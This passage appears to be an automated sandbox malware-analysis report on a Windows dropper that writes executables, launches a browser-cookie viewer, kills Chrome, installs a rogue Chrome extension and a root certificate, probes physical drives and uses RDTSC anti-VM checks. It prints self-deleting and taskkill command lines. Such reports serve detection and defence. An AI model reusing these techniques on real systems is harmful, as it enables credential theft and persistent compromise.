Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Login Data1611971442537
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6436:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5628:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe File created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
Source: Cyfj6XGbkd.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1611971443428.exe System information queried: HandleInformation
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\SysWOW64\msiexec.exe File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Cyfj6XGbkd.exe Virustotal: Detection: 40%
Source: Cyfj6XGbkd.exe Metadefender: Detection: 24%
Source: Cyfj6XGbkd.exe ReversingLabs: Detection: 58%
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe File read: C:\Users\user\Desktop\Cyfj6XGbkd.exe
Source: unknown Process created: C:\Users\user\Desktop\Cyfj6XGbkd.exe 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01
Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F759AAE600C1266B09FA365BCB174CA6 C
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Users\user\AppData\Roaming\1611971443428.exe 'C:\Users\user\AppData\Roaming\1611971443428.exe' /sjson 'C:\Users\user\AppData\Roaming\1611971443428.txt'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: unknown Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Process created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Process created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Process created: C:\Users\user\AppData\Roaming\1611971443428.exe 'C:\Users\user\AppData\Roaming\1611971443428.exe' /sjson 'C:\Users\user\AppData\Roaming\1611971443428.txt'
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\msiexec.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Install
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Cyfj6XGbkd.exe Static file information: File size 4247224 > 1048576
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611971443428.exe, 00000008.00000000.254487311.000000000040F000.00000002.00020000.sdmp, 1611971443428.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001C.00000000.316118028.0000000000F4C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSIB2E9.tmp.1.dr

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Unpacked PE file: 0.2.Cyfj6XGbkd.exe.2880000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Unpacked PE file: 4.2.56BB1610C0318054.exe.2620000.5.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00408D68
PE file contains an invalid checksum
Source: Cyfj6XGbkd.exe Static PE information: real checksum: 0xd69e9 should be: 0x41116d
Source: MSIB2E9.tmp.1.dr Static PE information: real checksum: 0x0 should be: 0x2d22
Source: 56BB1610C0318054.exe.0.dr Static PE information: real checksum: 0xd69e9 should be: 0x41116d
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_004038A0 push eax; ret 0_2_004038CE
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10010579 push ecx; ret 0_2_1001058C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 1_2_050AE024 push 00000078h; ret 1_2_050AE026
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 1_2_079BF4DC pushad ; iretd 1_2_079BF599
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 1_2_079BDD50 push 00000078h; ret 1_2_079BDD52
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 1_2_07A3F664 push 4801013Bh; retf 1_2_07A3F669
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_3_0311EDF7 push es; retf 2_3_0311F080
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10010579 push ecx; ret 2_2_1001058C
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040E2F1 push ecx; ret 8_2_0040E301
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040E340 push eax; ret 8_2_0040E354
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040E340 push eax; ret 8_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F43FB5 push ecx; ret 28_2_00F43FC8

Persistence and Installation Behavior:

Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d 0_2_1001DA70
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 0_2_1001D7E0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 0_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d 2_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 2_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 2_2_1001D7E0
Installs new ROOT certificates
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Roaming\1611971443428.exe
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\download\download_engine.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe File created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSIB2E9.tmp
Installs a Chrome extension
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\icon.png
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\icon48.png
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\popup.html
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\background.js
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\book.js
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\jquery-1.8.3.min.js
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\popup.js
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\manifest.json

Boot Survival:

Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d 0_2_1001DA70
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 0_2_1001D7E0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 0_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d 2_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 2_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 2_2_1001D7E0

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 8_2_0040C41D
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\msiexec.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_100204C0 0_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_100204C0 2_2_100204C0
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403BD4 second address: 0000000000403BDA instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403BFC second address: 0000000000403C02 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C23 second address: 0000000000403C29 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C43 second address: 0000000000403C49 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC881h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C6C second address: 0000000000403C72 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
